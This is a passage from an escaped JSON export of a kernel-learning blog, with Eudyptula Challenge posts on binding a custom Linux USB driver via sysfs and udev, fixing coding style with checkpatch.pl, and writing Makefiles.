usb_register(\u0026amp;driver); } static void __exit bye_usb(void) { pr_debug(\u0026#34;Bye from ayedaemonUSB.\\n\u0026#34;); usb_deregister(\u0026amp;driver); } module_init(hello_usb); module_exit(bye_usb); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task5\u0026#34;); You should be familiar with majority of the above code. This is how a simple linux module is written.\nFirst line is always the SPDX license. Read more here Then some imports from other available header files. init (hello_usb) and exit (bye_usb) as entry and exit functions for the module. Macro calls for registering and unregistering both init and exit functions. Along with some module metadata macro calls. Apart from this, we have some more code segment, which we are going to talk about in brief. At first, We need to create a struct usb_driver so that it can hold our driver information and the id_table. This id_table is very important for all the USB device drivers, as this list tells about the devices this driver can support. There are many macros that can help to define elements for this list. Each element is struct usb_device_id 13, and all the macros help to create this struct using only few values such as device class, product and vendor ids, etc.\nstruct usb_device_id { /* which fields to match against? */ __u16\tmatch_flags; /* Used for product specific matches; range is inclusive */ __u16\tidVendor; __u16\tidProduct; __u16\tbcdDevice_lo; __u16\tbcdDevice_hi; /* Used for device class matches */ __u8\tbDeviceClass; __u8\tbDeviceSubClass; __u8\tbDeviceProtocol; /* Used for interface class matches */ __u8\tbInterfaceClass; __u8\tbInterfaceSubClass; __u8\tbInterfaceProtocol; /* Used for vendor-specific interface matches */ __u8\tbInterfaceNumber; /* not matched against */ kernel_ulong_t\tdriver_info __attribute__((aligned(sizeof(kernel_ulong_t)))); }; So when we load this module into a running kernel:-\nthe hello_usb function will be executed and this in-turn will execute the usb_register function. usb_register function will register the device driver we created with struct usb_driver. This usb_driver will need few parameters like the name of the driver, functions to be called when this driver is loaded/unloaded by usb core. USB core will load this driver automatically, using hot-plug feature, when any usb device (which is supported by this driver) is plugged in. Along with other fields, usb_driver also contains a field that stores a list of all the devices this driver supports. This is used by USB core to know when to bind this driver with the usb device. MODULE_DEVICE_TABLE is the macro that exports the id_table to the usb core Final steps Now,all we need is a Makefile to make everything a bit automated and we are good to compile and load our USB module into the running kernel.\nCFLAGS_helloworld.o = -DDEBUG obj-m += HelloWorld.o KDIR ?= /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: uninstall $(MAKE) -C $(KDIR) M=$(PWD) clean install: default sudo insmod HelloWorld.ko lsmod | grep HelloWorld uninstall: - lsmod | grep HelloWorld - sudo rmmod HelloWorld.ko reload: uninstall clean default install @echo -e \u0026#34;\\nDONE\u0026#34; Just by doing make install we can compile and load the module into the kernel. There are multiple ways to monitor changes in kernel, for this case, I\u0026rsquo;ll use journalctl, udevadm and lsusb commands to check the module messages, USB changes, and associated driver information for my device.\nTo begin with anything, we need to compile and install the module and check the messages from kernel.\nCompile and load:-\nmake install Check kernel logs:-\n### COMMAND:- udevadm monitor --kernel KERNEL[1736.016830] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1736.016864] add /bus/usb/drivers/ayedaemonUSBdriver (drivers) KERNEL[1736.016888] add /module/HelloWorld (module) ### COMMAND:- journalctl --grep=usb -f Jun 29 11:11:41 FatSaturn kernel: usbcore: registered new interface driver ayedaemonUSBdriver Jun 29 11:11:41 FatSaturn kernel: USB driver registered this time ### COMMAND:- lsmod | grep HelloWorld HelloWorld 20480 0 The above logs helps us to identify that our module was loaded to the kernel successfully. Now time to insert the USB stick (pen-drive).\n### COMMAND:- udevadm monitor --kernel KERNEL[1981.372348] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3 (usb) KERNEL[1981.377254] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1981.378079] add /devices/virtual/workqueue/scsi_tmf_3 (workqueue) KERNEL[1981.379821] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3 (scsi) KERNEL[1981.379930] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/scsi_host/host3 (scsi_host) KERNEL[1981.380070] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1981.380229] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3 (usb) KERNEL[1982.383440] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0 (scsi) KERNEL[1982.383621] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0 (scsi) KERNEL[1982.383811] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/scsi_device/3:0:0:0 (scsi_device) KERNEL[1982.384405] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/scsi_disk/3:0:0:0 (scsi_disk) KERNEL[1982.385312] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/bsg/3:0:0:0 (bsg) KERNEL[1982.389641] add /devices/virtual/bdi/8:32 (bdi) KERNEL[1982.408429] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc (block) KERNEL[1982.408491] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc/sdc1 (block) KERNEL[1982.408532] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc/sdc2 (block) KERNEL[1982.410675] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0 (scsi) ### COMMAND:- journalctl --grep=usb -f Jun 29 11:15:46 FatSaturn kernel: usb 1-4.3: new high-speed USB device number 12 using xhci_hcd Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: New USB device found, idVendor=058f, idProduct=6387, bcdDevice= 1.00 Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3 Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: Product: Mass Storage Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: Manufacturer: Generic Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: SerialNumber: EFEC1147 Jun 29 11:15:47 FatSaturn kernel: usb-storage 1-4.3:1.0: USB Mass Storage device detected Jun 29 11:15:47 FatSaturn kernel: scsi host3: usb-storage 1-4.3:1.0 Jun 29 11:15:47 FatSaturn mtp-probe[8926]: checking bus 1, device 12: \u0026#34;/sys/devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3\u0026#34; Jun 29 11:15:47 FatSaturn mtp-probe[8939]: checking bus 1, device 12: \u0026#34;/sys/devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3\u0026#34; ### COMMAND:- lsusb Port 3: Dev 13, If 0, Class=Mass Storage, Driver=usb-storage, 480M Above output clearly shows that the pen-drive was detected but it was assigned to another driver instead of my custom driver. So we need to unbind my device with currently associated device driver and then bind it with our device driver. It is actually very easy to do in newer kernels (anything\u0026gt;=2.6.13-rc3). There are many resources for this topic on the Internet, but I found this one short and precise article on lwn.net. TL-DR; I just had to invoke 2 commands from a terminal.\nsudo /bin/bash -c \u0026#39;echo 1-4.3:1.0 \u0026gt; /sys/bus/usb/drivers/usb-storage/unbind\u0026#39; sudo /bin/bash -c \u0026#39;echo 1-4.3:1.0l \u0026gt; /sys/bus/usb/drivers/ayedaemonUSBdriver/bind\u0026#39; These are the files exposed by kernel to handle dynamic binding and unbinding from user-space. The number 1-4.3:1.0 the endpoint location specifier \u0026hellip; I mean this is a specifier that can be used to locate the actual endpoint for the USB that needs this driver.\nIf we break it down it\u0026rsquo;ll be much more understandable.\n## 1-4.3:1.0 1: root_hub 4: My USB hub (usb hub extension connected to laptop usb port) 3: USB device connected to that hub 1: Config number 0: Interface number To summarize, the device naming scheme is somewhat like this -\u0026gt; root_hub-hub_port.internal_port:config.interface. So If I directly plug my pen-drive into my laptop USB port, it should give me something like 1-*:1.0.. because I know I\u0026rsquo;m plugging it to bus 1 (It\u0026rsquo;s my laptop, I know it), and then the config.interface part will be same as the old one. Interesting thing to note here is that since there is no external hub connected this time, so the hub_port.internal_port will just be hub_port. So I\u0026rsquo;m expecting only 1 value in that place. Hence, 1-*:1.0 and in the logs, I got 1-2:1.0.\nIn this era of laziness and automation, we will want to do some automation for binding/unbinding. What we would need is a program that keeps on listening on the device events and help us to run our commands when a particular event occurs\u0026hellip;. udev can help us do that!!! All we have to do is write a simple rule and provide it to udev and the rest will be taken care of.\nTo create a udev rule, paste the below text in the following file - /etc/udev/rules.d/99-custom-usb.rules\nACTION==\u0026#34;bind\u0026#34;, SUBSYSTEMS==\u0026#34;usb\u0026#34;, \\ OPTIONS=\u0026#34;log_level=debug\u0026#34;, \\ ATTRS{idVendor}==\u0026#34;058f\u0026#34;, ATTRS{idProduct}==\u0026#34;6387\u0026#34;, \\ RUN+=\u0026#34;/bin/bash -c \u0026#39;echo $kernel \u0026gt; /sys/bus/usb/drivers/usb-storage/unbind\u0026#39;\u0026#34;, \\ RUN+=\u0026#34;/bin/bash -c \u0026#39;echo $kernel \u0026gt; /sys/bus/usb/drivers/ayedaemonUSBdriver/bind\u0026#39;\u0026#34; The above rule matches the USB Attributes and triggers the RUN commands accordingly. If you want this rule to be more generic, remove the ATTRS{idVendor} and ATTRS{idProduct}. Read here to learn more about writing udev rules.\nIf you change the C code and reload the module and remove the ATTRS selector from the udev rule, you can get a system where any usb-storage kind of devices will be automatically binded with Driver=ayedaemonUSBdriver.\nPort 3: Dev 18, If 0, Class=Mass Storage, Driver=ayedaemonUSBdriver, 480M ID 058f:6387 Alcor Micro Corp. Flash Drive Port 1: Dev 17, If 0, Class=Mass Storage, Driver=ayedaemonUSBdriver, 480M ID 0930:6545 Toshiba Corp. Kingston DataTraveler 102/2.0 / HEMA Flash Drive 2 GB / PNY Attache 4GB Stick Conclusion Writing a Linux USB device driver is not a difficult task if one understands how USB subsystem works behind the abstractions. This article just touches the surface of USB drivers and there is still a lot more to look out for\u0026hellip; like USB urbs. If you want to continue learning more about USB drivers, most common recommendation on internet is - Linux Device Drivers: Chapter 13. USB Drivers. This book is somewhat dated, but the content is still relevant.\nhttps://en.wikipedia.org/wiki/USB\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.usb.org/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttp://www.linux-usb.org/USB-guide/book1.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttp://www.linux-usb.org/usb.ids\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.usb.org/defined-class-codes\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/driver-api/usb/index.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L67\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/uapi/linux/usb/ch9.h#L407\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L232\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L82\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L374\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L626\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/mod_devicetable.h#L127\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-5/","summary":"This is Task 05 of the Eudyptula Challenge ------------------------------------------ Yeah, you survived the coding style mess! Now, on to some \u0026#34;real\u0026#34; things, as I know you are getting bored by these so far. So, simple task this time around: - take the kernel module you wrote for task 01, and modify it so that when a USB keyboard is plugged in, the module will be automatically loaded by the correct userspace hotplug tools (which are implemented by depmod / kmod / udev / mdev / systemd, depending on what distro you are using.","title":"Eudyptula Task5"},{"content":"This is Task 04 of the Eudyptula Challenge ------------------------------------------ Wonderful job in making it this far, I hope you have been having fun. Oh, you\u0026#39;re getting bored, just booting and installing kernels? Well, time for some pedantic things to make you feel that those kernel builds are actually fun! Part of the job of being a kernel developer is recognizing the proper Linux kernel coding style. The full description of this coding style can be found in the kernel itself, in the Documentation/CodingStyle file. I\u0026#39;d recommend going and reading that right now, it\u0026#39;s pretty simple stuff, and something that you are going to need to know and understand. There is also a tool in the kernel source tree in the scripts/ directory called checkpatch.pl that can be used to test for adhering to the coding style rules, as kernel programmers are lazy and prefer to let scripts do their work for them... And why a coding standard at all? That\u0026#39;s because of your brain (yes, yours, not mine, remember, I\u0026#39;m just some dumb shell scripts). Once your brain learns the patterns, the information contained really starts to sink in better. So it\u0026#39;s important that everyone follow the same standard so that the patterns become consistent. In other words, you want to make it really easy for other people to find the bugs in your code, and not be confused and distracted by the fact that you happen to prefer 5 spaces instead of tabs for indentation. Of course you would never prefer such a thing, I\u0026#39;d never accuse you of that, it was just an example, please forgive my impertinence! Anyway, the tasks for this round all deal with the Linux kernel coding style. Attached to this message are two kernel modules that do not follow the proper Linux kernel coding style rules. Please fix both of them up, and send it back to me in such a way that does follow the rules. What, you recognize one of these modules? Imagine that, perhaps I was right to accuse you of the using a \u0026#34;wrong\u0026#34; coding style :) Yes, the logic in the second module is crazy, and probably wrong, but don\u0026#39;t focus on that, just look at the patterns here, and fix up the coding style, do not remove lines of code. Coding styles \u0026ndash; what and why? We all have different styles and preferences in everything in life. Even while writing code, everyone loves to imprint their personalities in the code that brings originality and a sense of ownership and responsibility.\nCoding styles are set of rules or suggestions to write code. The idea behind developing these sets of rules for coding style is very simple - to make code readable by everybody or just to make your brain habitual to a specific style so that you can easily understand the code writen by another person.\nThe code style depends mainly on the language, few decisions are made depending on the context, and if you switch from one to another. Some of these decisions might be:\nComments (how and when you use them) Tabs or spaces for indentation (the number of spaces is quite important) Appropriate naming of variables and functions. Code grouping an organization, Patterns to be used or avoided. But what happens when a whole team is working on one project?\nEveryone develops a certain style and for individual work, this is great\u0026hellip; but when you need more people on your team, understanding different styles could become a problem to everyone.\nThis has been on my mind a lot lately. For instance, during a code review, I often question whether I should bring specific ways of coding into the discussion or not. How does it affect the application; Is it readable, is it easy to maintain?\nOr perhaps I should leave it alone, thinking to myself — Don’t be picky, it’s just their preference, it’s not a matter of right or wrong.\nLinuc kernel developers has done an amazing job to build a coding style that is followed by mostly everybody who is getting involved in kernel development process.\nHow bad can it go? If we do not have a properly defined coding style, we might end up with mostly working but very unreadable code\u0026hellip;. This can be very unhealty for a mere human being.\nLet\u0026rsquo;s take a simple example (In C programming language) to understand the need of coding styles.\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;This is a very long line with some garbage text. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Pulvinar neque laoreet suspendisse interdum consectetur libero. Turpis nunc eget lorem dolor sed viverra ipsum nunc. Semper feugiat nibh sed pulvinar proin gravida hendrerit lectus. Turpis egestas sed tempus urna et. Ornare lectus sit amet est placerat. Quam elementum pulvinar etiam non quam. Consequat semper viverra nam libero. Nisl condimentum id venenatis a condimentum vitae. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra.\u0026#34;); return 0; } Above code is very simple in terms of functionality - It prints a huge paragraph. The same code can also be written in the below style\u0026hellip;\n#include \u0026lt;stdio.h\u0026gt; int main () { printf ( \u0026#34;This is a very long line with some garbage text. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Pulvinar neque laoreet suspendisse interdum consectetur libero. Turpis nunc eget lorem dolor sed viverra ipsum nunc. Semper feugiat nibh sed pulvinar proin gravida hendrerit lectus. Turpis egestas sed tempus urna et. Ornare lectus sit amet est placerat. Quam elementum pulvinar etiam non quam. Consequat semper viverra nam libero. Nisl condimentum id venenatis a condimentum vitae. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra.\u0026#34; ) ;return 0; } I know nobody will ever write code in this style..but it is still a possible option to write a working code.\nOr you might be familiar with the below code\u0026hellip;. Spoiler:- This prints a rotating donut. Read this amazing article to understand the maths behind it.\nk;double sin() ,cos();main(){float A= 0,B=0,i,j,z[1760];char b[ 1760];printf(\u0026#34;\\x1b[2J\u0026#34;);for(;; ){memset(b,32,1760);memset(z,0,7040) ;for(j=0;6.28\u0026gt;j;j+=0.07)for(i=0;6.28 \u0026gt;i;i+=0.02){float c=sin(i),d=cos(j),e= sin(A),f=sin(j),g=cos(A),h=d+2,D=1/(c* h*e+f*g+5),l=cos (i),m=cos(B),n=s\\ in(B),t=c*h*g-f* e;int x=40+30*D* (l*h*m-t*n),y= 12+15*D*(l*h*n +t*m),o=x+80*y, N=8*((f*e-c*d*g )*m-c*d*e-f*g-l *d*n);if(22\u0026gt;y\u0026amp;\u0026amp; y\u0026gt;0\u0026amp;\u0026amp;x\u0026gt;0\u0026amp;\u0026amp;80\u0026gt;x\u0026amp;\u0026amp;D\u0026gt;z[o]){z[o]=D;;;b[o]= \u0026#34;.,-~:;=!*#$@\u0026#34;[N\u0026gt;0?N:0];}}/*#****!!-*/ printf(\u0026#34;\\x1b[H\u0026#34;);for(k=0;1761\u0026gt;k;k++) putchar(k%80?b[k]:10);A+=0.04;B+= 0.02;}}/*****####*******!!=;:~ ~::==!!!**********!!!==::- .,~~;;;========;;;:~-. ..,--------,*/ Anyways, my point is that the code can become very unreadable and unmaintainable if no coding style guidelines are defined. Early in my journey, I engaged in all kinds of holy wars on code styles. I would read some article about why a particular convention was correct, while another was totally wrong. But I\u0026rsquo;ve finally come to a conclusion - These things don\u0026rsquo;t matter; Consistency and readability matters.\nThe development process of linux kernel is very chaotic with thousands of developers working completely remotely on the same code base. How do they do it without messing it all up??\nOut of many reasons, one is that all kernel developers try best to follow the code style guidelines laid out in the official kernel documentations 1. Here they provide all the necessary details and examples to put their point. And still, it is just a recommendation not forcing anybody to be very specific about it.\nFixing style issue problem In this task, we are provided with 2 different modules (Linux Kernel Modules)\u0026hellip; and our job here is to fix the style coding as per the coding style.\nYou don\u0026rsquo;t have to read the complete coding style to fix it, smart people have already built a tool that can check these issues and provide a warning to us in a clean way. Linux provides a script/checkpatch.pl 2 script, for the same. This script can check the code for trivial style violations in patches and optionally corrects them. This tool can also be used for regular kernel source code files. Read more about this tool from official docs 3.\nThis is not a very unique idea, today we have linters and other tools that can check the style issues and report it or fix it automatically in your source code\u0026hellip;.in almost all the program languages. You can add one such tool in you pre-commit hook or most IDEs have plugins for this, you can use those too.\nAnyways, let\u0026rsquo;s pick up a file and run the checkpatch tool against it. The code looked fine to me at first\u0026hellip; it had a good filename at top and has got indentations.\n/* * helloworld.c */ #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; static int hello_init(void) { pr_debug(\u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_exit(void) { pr_debug(\u0026#34;See you later.\\n\u0026#34;); } module_init(hello_init); module_exit(hello_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Just a module\u0026#34;); But it still does not follow the guidelines. You can check that using the tool - checkpatch.pl.\n## COMMAND - ../linux/scripts/checkpatch.pl -f helloworld.c WARNING: Missing or malformed SPDX-License-Identifier tag in line 1 #1: FILE: helloworld.c:1: +/* WARNING: It\u0026#39;s generally not useful to have the filename in the file #2: FILE: helloworld.c:2: +* helloworld.c WARNING: Block comments should align the * on each line #2: FILE: helloworld.c:2: +/* +* helloworld.c total: 0 errors, 3 warnings, 24 lines checked There are 3 warnings reported by this script\u0026hellip;\nAdd SPDX licence info in line 1 Filename at top is not useful Block comments should have * aligned (This will be discarded because according to point 2, we are going to remove that comment block) Now after fixing the code according to the provided suggestions, we get the below code:\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; static int hello_init(void) { pr_debug(\u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_exit(void) { pr_debug(\u0026#34;See you later.\\n\u0026#34;); } module_init(hello_init); module_exit(hello_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Just a module\u0026#34;); In other module file, we have another code that looks good at first but the checkpatch reults indicate otherwise.\nCode:-\n#include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/delay.h\u0026gt; #include \u0026lt;linux/slab.h\u0026gt; int do_work(int *my_int, int retval) { int x; int y = *my_int; int z; for (x = 0; x \u0026lt; *my_int; ++x) udelay(10); if (y \u0026lt; 10) /* * That was a long sleep, tell userspace about it */ pr_debug(\u0026#34;We slept a long time!\u0026#34;); z = x * y; return z; } int my_init(void) { int x = 10; x = do_work(\u0026amp;x, x); return x; } void my_exit(void) { return; } module_init(my_init); module_exit(my_exit); This module is somewhat different than what we previously saw. Apart from the regular init and exit functions, this module has an extra function that is called by init function. That\u0026rsquo;s it. You don\u0026rsquo;t have to worry about the code and other logic at this point.. just focus on coding styles.\n# COMMAND - ../linux/scripts/checkpatch.pl -f coding_style.c WARNING: Missing or malformed SPDX-License-Identifier tag in line 1 #1: FILE: coding_style.c:1: +#include \u0026lt;linux/module.h\u0026gt; WARNING: void function return statements are not generally useful #35: FILE: coding_style.c:35: +\treturn; +} total: 0 errors, 2 warnings, 38 lines checked The script gives us 2 warnings for this module.\nSPDX licence (just as the previous one, we\u0026rsquo;ll talk more about it later.) void function return statements. (Void functions do not return anything; no return statements are required) For this case, I added the SPDX licence comment at line 1 and commented the return statement. If you want, you can remove it entirely from the code. For me, the new code looks like below:-\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/delay.h\u0026gt; #include \u0026lt;linux/slab.h\u0026gt; int do_work(int *my_int, int retval) { int x; int y = *my_int; int z; for (x = 0; x \u0026lt; *my_int; ++x) udelay(10); if (y \u0026lt; 10) /* * That was a long sleep, tell userspace about it */ pr_debug(\u0026#34;We slept a long time!\u0026#34;); z = x * y; return z; } int my_init(void) { int x = 10; x = do_work(\u0026amp;x, x); return x; } void my_exit(void) { // return; } module_init(my_init); module_exit(my_exit); Great!! you are now familiar with the coding style issues in the linux kernel code and has got the ability to fix such issues. If you want to be more automatic with this, you can also use the pre-commit hooks. Read more about git hooks from githooks.com 4\nhttps://www.kernel.org/doc/html/v4.10/process/coding-style.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/scripts/checkpatch.pl\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/dev-tools/checkpatch.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://githooks.com/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-4/","summary":"This is Task 04 of the Eudyptula Challenge ------------------------------------------ Wonderful job in making it this far, I hope you have been having fun. Oh, you\u0026#39;re getting bored, just booting and installing kernels? Well, time for some pedantic things to make you feel that those kernel builds are actually fun! Part of the job of being a kernel developer is recognizing the proper Linux kernel coding style. The full description of this coding style can be found in the kernel itself, in the Documentation/CodingStyle file.","title":"Eudyptula Task4"},{"content":"This is Task 03 of the Eudyptula Challenge ------------------------------------------ Now that you have your custom kernel up and running, it\u0026#39;s time to modify it! The tasks for this round is: - take the kernel git tree from Task 02 and modify the Makefile to and modify the EXTRAVERSION field. Do this in a way that the running kernel (after modifying the Makefile, rebuilding, and rebooting) has the characters \u0026#34;-eudyptula\u0026#34; in the version string. - show proof of booting this kernel. Extra cookies for you by providing creative examples, especially if done in intrepretive dance at your local pub. - Send a patch that shows the Makefile modified. Do this in a manner that would be acceptable for merging in the kernel source tree. (Hint, read the file Documentation/SubmittingPatches and follow the steps there.) Linux kernel source code is very huge and compiling such source code files can be tiring, especially when you have to include several source files from different directories and type the compiling command every time you need to compile. Makefiles are the solution to automate and simplify this task.\nWhat is a Makefile?? Makefile is a specially formated file which contains all the steps to compile your program in the form of rules. These rules are also sometimes referred as recipes (\u0026hellip;but they both are totally different things🤷‍♂️) and these rules are executed by a utility called make. You might have used make to compile a program from source code. Most open source projects use it to compile a final executable binary, which can then be installed typically using make install.\nUnderstand with examples Let\u0026rsquo;s start with very simple and classic example - \u0026ldquo;Hello World\u0026rdquo;. To begin with, create a new directory called my_make_dir containing a Makefile with below contents in it.\n# Comment - this says hello say_hello: echo \u0026#34;Hello World\u0026#34; If you run make say_hello inside the directory, it\u0026rsquo;ll give below output:\necho \u0026#34;Hello World\u0026#34; Hello World We just created our first Makefile rule and triggered it to run. Here say_hello behaves like a function name, this is also called target and echo \u0026quot;Hello World\u0026quot; is a recipie. In a single Makefile there can be multiple targets with multiple sets of recepies.\nLet\u0026rsquo;s take a look at another example now,\n# Comment - this says hello say_hello: echo \u0026#34;Hello World\u0026#34; say_bye: say_hello echo \u0026#34;I\u0026#39;m going now!\u0026#34; echo \u0026#34;Bye Bye world\u0026#34; In above example, we have 2 targets, namely, say_hello and say_bye. In the target - say_bye, we have set say_hello as dependency or prerequisite. Pre-requisites are like another targets in the Makefile which should run before the intended target. So when we will invoke say_bye command, it\u0026rsquo;ll first trigger the prerequisite say_hello and then say_bye will be triggered.\n# COMMAND - make say_bye echo \u0026#34;Hello World\u0026#34; Hello World echo \u0026#34;I\u0026#39;m going now!\u0026#34; I\u0026#39;m going now! echo \u0026#34;Bye Bye world\u0026#34; Bye Bye world Another key point about make utility is that whenever it does not take any targets to trigger, it\u0026rsquo;ll trigger the top most target present in the Makefile. In this case, it\u0026rsquo;ll trigger say_hello as it is in the first target in the Makefile.\n# COMMAND - make echo \u0026#34;Hello World\u0026#34; Hello World More practical examples Now we know some basic terminology around Makefiles and how it works. Let\u0026rsquo;s take a look at some more practical example that can be related to a real-world task.\nall: say_hello generate say_hello: @echo \u0026#34;Hello World\u0026#34; generate: @echo \u0026#34;Creating empty text files...\u0026#34; touch file-{1..10}.txt clean: @echo \u0026#34;Cleaning up...\u0026#34; rm *.txt say_bye: clean @echo \u0026#34;Bye World\u0026#34; In above example, we have got many targets, some with pre-requisites and some without those. Let\u0026rsquo;s pick each one of them and go one by one:\nall : This is the first target in the file and if we do not pass any target to make utility, it\u0026rsquo;ll trigger this target by default. This has got no recipes - just a simple rule without recipes. But this rule has some pre-requisites that will run before anything (in the given order - First say_hello and generate. say_hello : This is another target that can be triggered as a single rule or as a pre-requisite for all target. Anyways, it\u0026rsquo;ll simply print the following string - Hello World. generate : This target is responsible to generate 10 empty files ranging from 1-10. Just like say_hello, it can also be triggered as a single standalone target or as a pre-requisite for all target. Clean : This target cleans all the .txt files from the folder. Idea is to delete all the files created by generate target. say_bye : This target prints \u0026ldquo;Bye World\u0026rdquo;, but has clean target as a pre-requisite so it\u0026rsquo;ll first clean and then it\u0026rsquo;ll run it\u0026rsquo;s own recipes. Note:- any line after # (hash) character will be treated as comments by make utility\nNow we understand what the Makefile consists of, let\u0026rsquo;s see how we are going to use it for our case.\nTo get a \u0026ldquo;Hello World\u0026rdquo; msg and create all the files we can simply type make. This will trigger the first target all, that in turn will execute say_hello and generate. Once you are done with everything and what to clean-up the mess, you can just type make bye_world. This target will first clean and then provide you with a goodbye message. That\u0026rsquo;s it. Pretty easy, isn\u0026rsquo;t it? Now let\u0026rsquo;s bang our head with another example that is more close to the real world application.\nFor this, we need to write our program (I\u0026rsquo;ll use C language for that, language is never a barrier for make command). Open up a text editor and write your first HelloWorld.c program.\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;Hello World\\n\u0026#34;); return 0; } The above program will simply print \u0026ldquo;Hello World\u0026rdquo; when compiled and executed. We can write make recipes for this now.\n# Compile the source code HelloWorld.o: HelloWorld.c gcc HelloWorld.c -o HelloWorld.o # Execute the binary HelloWorld: HelloWorld.o ./HelloWorld.o The above Makefile has 2 rules with HelloWorld.o and HelloWorld as targets. Both targets have some recipes and some pre-requisites to it. Remember, the pre-requisite executes first and then the actual recipe for the target\u0026hellip; That\u0026rsquo;s how these rules work.\nSo if I trigger HelloWorld target, then it\u0026rsquo;ll trigger the HelloWorld.o target as pre-requisite, which will compile the HelloWorld.c source code; Once the HelloWorld.o target is completed, it\u0026rsquo;ll execute the generated ./HelloWorld.o binary\u0026hellip; This can be now further reduced to just invoking single make command, by making sure that HelloWorld target runs first by default.\nYou\u0026rsquo;ll have to change the Makefile to get desired behaviour,\n# Creates a variable (this points to the compiler) CC=gcc # First target in the file, default. all: HelloWorld # Executes the source code HelloWorld: HelloWorld.o ./HelloWorld.o # Compile the source code HelloWorld.o: HelloWorld.c ${CC} 